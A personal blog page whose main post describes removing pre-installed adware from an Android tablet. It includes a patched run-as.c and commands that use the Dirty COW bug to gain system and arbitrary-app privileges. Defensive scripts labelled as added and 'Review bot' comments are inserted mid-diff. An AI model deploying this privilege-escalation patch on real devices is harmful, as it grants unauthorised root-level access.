...stuff I do and things I like...

Saturday, January 05 2019

Getting 'rid' of pre-installed Malware on my YellYouth Android Tablet

In November I bought a cheap Android tablet for a wall-mounted display (see this blog post: Android InfoPanel). After a couple of days (or weeks?) some overlay ads and warnings from Google Play about malicious apps suddenly appeared. I didn't have time to investigate, so I just tried to close the apps and ads. This was complicated by the fact that all of it was in Chinese. I ended up navigating the menu of what looked like a 3rd-party app store to uninstall an app named Retipuj that was flagged by Google Play for ad fraud. All of this using Google Translate on my phone.



This solution worked for a couple of days. Returning from my holiday trip I was greeted by overlay ads once again. Luckily I had some time on my hands to investigate. Here is a short write-up.

Part 1, observations and hoping for an easy way out:
    I found one app that I didn't install (com.hero.filter); I uninstalled it via adb uninstall com.hero.filter. I tried Googling the package name but without success.

    Removing the app didn't seem to do anything. Judging by the task bar there still seem to be a number of apps running, but checking via Settings/Apps and on the filesystem (/data/apps) no such apps are installed. Every now and then a pop-up appears that looks like a 3rd-party market trying to download and install apps. Installation is blocked by Google Play (Verify Apps, I assume).

Part 2, looking at processes:
    I found two interesting looking processes, net.atlas.utopia and android.hb.uys.pbuild; judging by the SELinux context they seem to be platform apps (u:r:platform_app:s0). These could be candidates (spoiler: they are). Using pm list packages -f I determined that net.atlas.utopia is installed in /system/priv-app/Kyz2203 with its data in /data/data/net.atlas.utopia.

    pm list packages -f (only showing some interesting packages):
      package:/data/app/com.hero.filter-1/base.apk=com.hero.filter
      package:/system/app/AutoDialer/AutoDialer.apk=com.example
      package:/system/priv-app/Kyz2203/Kyz2203.apk=net.atlas.utopia
      package:/system/priv-app/reanimation/reanimation.apk=android.hb.uys.pbuild
      
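    To apply the same triage to a saved listing, here is an added example (not the post author's code): it parses lines of the form package:<apk path>=<package name>, sorts packages by partition, and flags preloaded apps in /system/app or /system/priv-app whose APK directory name shares nothing with the package name (Kyz2203 vs net.atlas.utopia). That heuristic is an assumption of the example, not a rule from the post, and the sample listing is constructed from the post's output plus one ordinary priv-app entry.

```sh
#!/bin/sh
# Triage a saved `adb shell pm list packages -f` listing (added example, not the
# post's own tooling). Each input line has the form  package:<apk path>=<package name>.

# Constructed sample: the four lines quoted in the post plus one ordinary priv-app
# entry (Settings) so the heuristic below has something it should leave alone.
SAMPLE_LISTING='package:/data/app/com.hero.filter-1/base.apk=com.hero.filter
package:/system/app/AutoDialer/AutoDialer.apk=com.example
package:/system/priv-app/Kyz2203/Kyz2203.apk=net.atlas.utopia
package:/system/priv-app/reanimation/reanimation.apk=android.hb.uys.pbuild
package:/system/priv-app/Settings/Settings.apk=com.android.settings'

# classify_packages LISTING
# Prints one "partition package apkdir" line per package, where partition is
# data (user-installed), system-app, priv-app (privileged, read-only /system) or other.
classify_packages() {
    printf '%s\n' "$1" | awk -F= '
        /^package:/ {
            path = substr($1, 9)                 # drop the "package:" prefix
            pkg  = $2
            n = split(path, parts, "/")
            dir = parts[n - 1]                   # directory that holds the APK
            if (path ~ /^\/system\/priv-app\//)   part = "priv-app"
            else if (path ~ /^\/system\/app\//)   part = "system-app"
            else if (path ~ /^\/data\/app\//)     part = "data"
            else                                  part = "other"
            print part, pkg, dir
        }'
}

# flag_odd_system_apps LISTING
# Heuristic (an assumption of this example, not a rule from the post): a preloaded
# app in /system/app or /system/priv-app whose APK directory name does not appear
# anywhere in its package name deserves a closer look. Prints "package (apkdir)"
# per hit. Expect false positives on legitimate vendor apps, so treat the output
# as a review list, not a verdict.
flag_odd_system_apps() {
    classify_packages "$1" | awk '
        $1 == "priv-app" || $1 == "system-app" {
            if (index(tolower($2), tolower($3)) == 0) print $2 " (" $3 ")"
        }'
}

# Against a real device:  adb shell pm list packages -f > listing.txt
#                         flag_odd_system_apps "$(cat listing.txt)"
flag_odd_system_apps "$SAMPLE_LISTING"
```

    On the constructed sample this reports com.example, net.atlas.utopia and android.hb.uys.pbuild and leaves com.android.settings alone; on a real device the list is only a starting point for the kind of manual look at permissions and intent filters described below.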

Part 3, a quick peek into net.atlas.utopia:
    Permissions: this app has just about every permission you can think of, including installing and deleting packages, sending SMS, and reading and writing any setting and file. Further, it has a number of app permissions specific to Lenovo, Oppo, Huawei and HTC devices.

    The app registers intent filters for a number of events: boot up, time zone change, packages install/remove, outgoing calls, etc. It basically monitors everything that is going on on the device. Pretty shitty.

    The data directory also contained a dex file with the name whatsappui1.dex. A quick Google search on whatsappui1 has one hit on Team Cymru's hash list: whatsappui1, with few details, but it identifies the file as being associated with ad-based malware.

    The most interesting thing I found in this app is the use of a 3rd-party library called DroidPlugin. DroidPlugin is a plugin framework for Android that allows running any third-party APK without installing, modifying or repackaging it. Seems like the perfect tool for malware distribution.

Part 4, a quick peek into android.hb.uys.pbuild:
    Permissions are very similar to those of net.atlas.utopia, including the permissions specific to certain device manufacturers.

    The manifest contains traces of ad-related things. The library directory contains libiohook.so. The library contains symbols from Cydia Substrate. The library name appears in various search results that indicate ad-related malware.

    The asset directory contains a certificate ky_dsa_public.crt with an uninteresting issuer, and a jar file that contains a dex file and two .png files that actually hold ASCII text.

Part 5, getting rid of it all:
    How do we get rid of pre-installed software? The system partition is read-only, so we can't uninstall it! The best idea that does not involve rooting and flashing new firmware is disabling the package using the package manager (pm disable net.atlas.utopia); this, however, requires system privileges, which you don't have without rooting. You can disable apps via Settings, but only if they appear in the list, and the ones we want to disable are not in the list.

    How do we get system? The tablet still runs a 3.10.72 kernel, so it might be vulnerable to dirtycow. I checked using the tools from timwr, and yes, it is vulnerable to dirtycow. Using my modified version of run-as, as shown in my SafetyNet talk, we can become the system user and disable any package we want by running pm disable PACKAGE.

    Here is the list of packages I disabled; so far no APKs are getting installed and I haven't seen any more ads.

    pm list packages -d
      package:com.mediatek.schpwronoff
      package:android.hb.uys.pbuild
      package:com.mediatek.ygps
      package:com.android.htmlviewer
      package:com.android.browser
      package:com.hero.filter
      package:com.example
      package:com.svox.pico
      package:com.opera.max.global
      package:com.android.dreams.phototable
      package:net.atlas.utopia
      package:com.mediatek.weather
      package:com.opera.max.loader
      package:com.qihoo.appstore
      package:com.fw.upgrade.sysoper
      package:com.android.vpndialogs
      
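    Given that one of the packages is literally called reanimation, it is worth re-checking after every reboot that the disabled set stayed disabled. Here is an added example (not the post author's code) that compares a saved copy of the list above with a fresh pm list packages -d listing and prints whatever is no longer disabled. The "before" listing is the one quoted above; the "after" listing is a constructed sample in which two packages are missing.

```sh
#!/bin/sh
# Re-check that disabled packages stayed disabled (added example, not the post's
# own tooling). Input is the text of `adb shell pm list packages -d`,
# one "package:<name>" per line.

# The set disabled in the post, taken from its `pm list packages -d` output.
DISABLED_BEFORE='package:com.mediatek.schpwronoff
package:android.hb.uys.pbuild
package:com.mediatek.ygps
package:com.android.htmlviewer
package:com.android.browser
package:com.hero.filter
package:com.example
package:com.svox.pico
package:com.opera.max.global
package:com.android.dreams.phototable
package:net.atlas.utopia
package:com.mediatek.weather
package:com.opera.max.loader
package:com.qihoo.appstore
package:com.fw.upgrade.sysoper
package:com.android.vpndialogs'

# Constructed "after reboot" listing for the demo: the same set minus
# net.atlas.utopia and com.hero.filter, simulating two packages that came back.
DISABLED_AFTER='package:com.mediatek.schpwronoff
package:android.hb.uys.pbuild
package:com.mediatek.ygps
package:com.android.htmlviewer
package:com.android.browser
package:com.example
package:com.svox.pico
package:com.opera.max.global
package:com.android.dreams.phototable
package:com.mediatek.weather
package:com.opera.max.loader
package:com.qihoo.appstore
package:com.fw.upgrade.sysoper
package:com.android.vpndialogs'

# package_names LISTING  -> package names without the "package:" prefix, input order
package_names() {
    printf '%s\n' "$1" | sed -n 's/^package://p'
}

# reenabled_packages BEFORE AFTER
# Prints packages present in BEFORE but missing from AFTER, i.e. packages that are
# no longer disabled. Empty output means nothing came back.
reenabled_packages() {
    after=$(package_names "$2")
    package_names "$1" | awk -v after="$after" '
        BEGIN { n = split(after, a, "\n"); for (i = 1; i <= n; i++) seen[a[i]] = 1 }
        !($0 in seen)'
}

# Against a real device:  adb shell pm list packages -d > disabled-now.txt
#                         reenabled_packages "$(cat disabled-before.txt)" "$(cat disabled-now.txt)"
reenabled_packages "$DISABLED_BEFORE" "$DISABLED_AFTER"
```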

Part 7, Dirtycow trickery:
    As described in my slides, you can modify run-as.c from timwr to become any UID with almost any SELinux context (depending on the device's SELinux policy!). For our purpose we can become any UID and context that we require. Below are some notes on how this works.

    Dirtycow lets you overwrite any file; that is how you replace /system/bin/run-as with your own binary. The binary cannot be bigger than the one you are overwriting. This can be a problem when you have a very small run-as (9k in my case).
    1|shell@KT107:/data/local/tmp $ ls -al /system/bin/run-as                      
    -rwsr-s--- root     shell        9444 2018-09-27 03:44 run-as
    
    The workaround I took was not using ndk-build to build run-as.c and instead manually running arm gcc. This reduces the binary size because the compiler flags used by the NDK are dropped. Another solution would be to just load a shared library from run-as to keep the binary small.

    Once you have my version of run-as you can become (almost) any user.
    shell@KT107:/data/local/tmp $ run-as 1000 u:r:platform_app:s0
    shell@KT107:/data/local/tmp $ id
    uid=1000(system) gid=1000(system) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:platform_app:s0
    
    System (UID 1000) allows you to poke around /data/app/* and /data/data. If you want to explore /data/data/APP you need to assume the UID and context of that app.
    shell@KT107:/data/data $ ls -al
    drwxr-x--x u0_a13   u0_a13            u:object_r:app_data_file:s0 net.atlas.utopia
    run-as 10013 u:r:platform_app:s0
    shell@KT107:/data/data $ id
    uid=10013(u0_a13) gid=10013(u0_a13) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:platform_app:s0
    shell@KT107:/data/data/net.atlas.utopia $ ls -al
    drwx------ u0_a13   u0_a13            2017-12-31 19:00 Plugin
    drwxrwx--x u0_a13   u0_a13            2017-12-31 19:00 app_dex
    drwxrwx--x u0_a13   u0_a13            2017-12-31 19:00 cache
    drwxrwx--x u0_a13   u0_a13            2017-12-31 19:00 databases
    drwx------ u0_a13   u0_a13            2017-12-31 19:00 fankingbox
    lrwxrwxrwx install  install           2015-12-31 19:00 lib -> /data/app-lib/net.atlas.utopia
    drwxrwx--x u0_a13   u0_a13            2019-01-03 15:56 shared_prefs
    -rw------- u0_a13   u0_a13       9572 2019-01-03 15:54 whatsappui1.dex
    

    Below is my patch for run-as.c. My version sets the UID from the first argument and the SELinux context from the second argument.
    --- run-as-crm.c	2019-01-03 17:54:41.153471054 -0500
    +++ run-as.c	2019-01-03 17:58:39.378353437 -0500
    @@ -28,6 +28,8 @@
     {
     	LOGV("uid %s %d", argv[0], getuid());
     
    +	int duid = atoi(argv[1]);
    +
     	if (setresgid(0, 0, 0) || setresuid(0, 0, 0)) {
     		LOGV("setresgid/setresuid failed");
     	}
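    Review bot: argv[1] is handed to atoi() with no argc check, so running the binary with fewer than two arguments dereferences a null pointer, and a non-numeric argument silently yields 0, which means the setresuid(duid, …) call in the last hunk keeps the process at uid 0 instead of failing. Check argc first and parse with strtol(), rejecting an empty or partially consumed string.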
    @@ -56,7 +58,7 @@
     				LOGV("dlsym setcon error %s", error);
     			} else {
     				setcon_t * setcon_p = (setcon_t*)setcon;
    -				ret = (*setcon_p)("u:r:shell:s0");
    +				ret = (*setcon_p)(argv[2]);
     				ret = (*getcon_p)(&secontext);
     				LOGV("context %d %s", ret, secontext);
     			}
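    Review bot: the return value of the setcon call is overwritten by the getcon call on the very next line before anyone looks at it, so a context switch that the device policy refuses goes unnoticed apart from the LOGV output; argv[2] is also dereferenced without an argc check. Test ret immediately after `ret = (*setcon_p)(argv[2]);` and bail out when it is non-zero.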
    @@ -66,6 +68,12 @@
     		LOGV("no selinux?");
     	}
     
    +	if (setresgid(duid, duid, duid) || setresuid(duid, duid, duid)) {
    +		LOGV("setresgid/setresuid failed");
    +	}
    +	LOGV("uid %d", getuid());
    +
     	system("/system/bin/sh -i");
     
    -}
    \ No newline at end of file
    +}
    +
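    Review bot: a failure of setresgid/setresuid is only logged and the interactive shell is spawned anyway, so the caller can end up in a shell with a different UID than the one requested; exit on failure instead. Supplementary groups are never reset (no setgroups() call), which is why the id output earlier in the post still lists the adb, sdcard_rw and sdcard_r groups after switching to uid 1000 or 10013. The final `+` line only adds an empty line at the end of the file.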
    

Conclusions:
    Overall I would have preferred not to get pre-installed malware on my Android tablet, as I would rather have spent my time on my InfoPanel app or on other projects. However, it was impossible for me to ignore this issue and simply buy a different tablet. Tracking down the malware still was kinda fun. It was the first time I experienced the issue of pre-installed malware first hand. I'm also fairly happy that I didn't have to modify the firmware, since this would have cost way more time. The most interesting thing I found was definitely the DroidPlugin project that allows running APKs without installing them. I wish I had more time to reverse engineer all the different apps and how they work together. I uploaded a zip file containing most components I talked about in this blog post here: yellyouth.zip.

    I hope I finally disabled all of the components and have an ad free device.

Tuesday, November 27 2018

Android InfoPanel aka Home InfoPanel Redux

In 2007/2008 I built an InfoPanel for my apartment to show me news, the weather and other interesting and fun things. The original InfoPanel was built using a VIA x86 mini-ITX board and a 17" touchscreen, all fitted in a self-made wooden case. The InfoPanel survived until 2012 when I moved to the U.S. It was too old and too big to bring, so I dismantled it.

I always missed it and thought about bringing it back. For a brief time I used an old Samsung Galaxy Tab 10", but the device was just not right. Starting with a proprietary Samsung USB connector that didn't allow for nice-looking cabling, the device was black and silver so it didn't look too nice on the wall, and finally the device was just old and slow. Long story short, it only stayed on the wall for a couple of weeks and I just ran a full-screen web browser.

The new InfoPanel

Hardware: Android 10" tablet in a white case with a USB connector on the long side.
Software: custom Android app that hides the Android navigation elements and status bar.



Hardware
    I chose a Yellyouth Android 10" tablet; those tablets are damn cheap (just under $100) but also kinda tricky. The good parts: 4GB RAM and a fast processor. The tricky parts: the product description says the resolution is 2560x1600, and my device reports that resolution in the system info, but the screen reports 1216x800 pixels. The device does not contain any sensors such as a light or proximity sensor (you will see why that matters later). The GSM modem does not support T-Mobile/AT&T SIM cards; I thought this was a joke, but I tried a Google Fi data-only SIM (T-Mobile) and the device couldn't connect to any network (this is fine since I only use WiFi).

Software
    I wrote a small Android application that basically shows a full screen webview. I've added a back and reload button to allow returning to the main page from links I clicked. The application hides all system UI (navigation and status bar). The user can swipe from bottom to top or top to bottom to reveal the back and reload buttons. The buttons auto hide after a short timeout. A really basic Android app!

    I wanted to conserve power and turn off the screen when I'm not using the InfoPanel. Luckily saving power is a default function of Android (you can just set the inactivity timeout after which the screen will be dimmed and eventually turned off).

    The catch: how do I turn the screen back on (without pressing the power button - since that is not super practical!)?

    Ideas:
    • Motion detection using the camera: several projects exist and I've got it integrated, but I was not able to get it working while the screen was off (I also didn't want to spend a lot of time on this part).
    • Motion detection using the light sensor: I implemented this using a Nexus 7 tablet, a background service monitors the sensor and wakes up the device once it detects a significant change in brightness - sadly the Yellyouth device does not have a light sensor.
    • Audio activation: the idea is to monitor the ambient noise and wake up the tablet when there is a loud noise (finger snap or clap), I implemented this using a background task that records audio and discards the content and only monitors the amplitude (there is a built-in method in the SDK to query the amplitude!)
Result


All in all a fun weekend/evening project of a few hours.

Tuesday, September 09 2008

Slides for my Home InfoPanel talk from MRMCD111b

I did a talk about my Home InfoPanel project at the MRMCD111b last weekend. In the slides I try to cover the idea, the build process, some obstacles and show many pretty pictures.

The slides are available here (40 MB)

Sunday, August 03 2008

MRMCD111 Sep 5-7 in Darmstadt

I'm going to do a talk on my InfoPanel project.

Event website is at: MRMCD111

Saturday, June 14 2008

InfoPanel Case is ready!

I finally finished the case for my InfoPanel; well, actually my father did most of the wood work. I only designed the case and he built it with a little help from me. Judith did the paint job. Thanks to both of them!

I made a bunch of photos of the finished device hanging on the wall. Once the panel is completed I'll post even more with better quality. The parts that are missing now are the webcam and the microphone. The little hole above the screen is for the webcam. I know it almost looks like an iMac :-)

Now I need to finish the infopanel software I've started in December last year.

Sunday, January 13 2008

InfoPanel: Pennon 17" TFT disassembly

Today I didn't feel so much like coding (I actually wanted to work on one of my many software projects), so I decided to do hardware stuff. I ended up disassembling the 17" TFT touchscreen I use for my InfoPanel project. This had two reasons. First, I need to disassemble it in order to remove the casing to make it smaller so I can put it into my self-made frame. Second, I need to check out the touchscreen controller. I think it is broken or has a software bug, since it sometimes just stops reporting any events and only comes back to life after power cycling the display. I probably need to buy a new controller; any tips on where to buy such a controller (in Germany) are welcome.

On the good side I found that the actual LCD is perfect for my project. It is only 1 cm thick and has nice mounts on each side. This will make it really easy putting it in my own frame.

For those of you who like hardware porn, the images are here.

Tuesday, January 01 2008

24C3 Roundup

Mmmh, somehow I never manage to blog on more than the first day of the congress :-) So here is my personal 24C3 roundup.

First a big thank you to the organizers. It was real fun again! I met a lot of friends I only see at these kinds of events (C3, Camp, etc.) and again I met a bunch of interesting people I didn't know before.

The talks were quite good all together, and I had the impression that the overall quality was better than in the years before. But I was missing THE highlight of the event. Maybe I just missed it?

A couple of people asked for my Home InfoPanel talk which I didn't give so I'm going to keep this in mind for the next conference/meeting that comes up.

As usual I met with the Bluetooth (Security) people to chat about this and that. Evilgenius Martin has a nice story about some 24C3-Bluetooth-Stuff on his blog. I also briefly met balle from Datenterroristen.de, who is behind Bluediving (a Bluetooth security suite).

As a side note: there seems to be an exploit for the JPEG parser of Nokia Series40 phones which causes the phones to crash whenever they try to read a special kind of JPEG image file. Apparently someone was sending a specially crafted file to every mobile phone with Bluetooth switched on at the congress. I heard that there is another mobile phone brand that is also vulnerable to this JPEG, and apparently one guy got his phone bricked by it. I'll soon look at this JPEG and post about this issue.

Great time, see you at 25C3.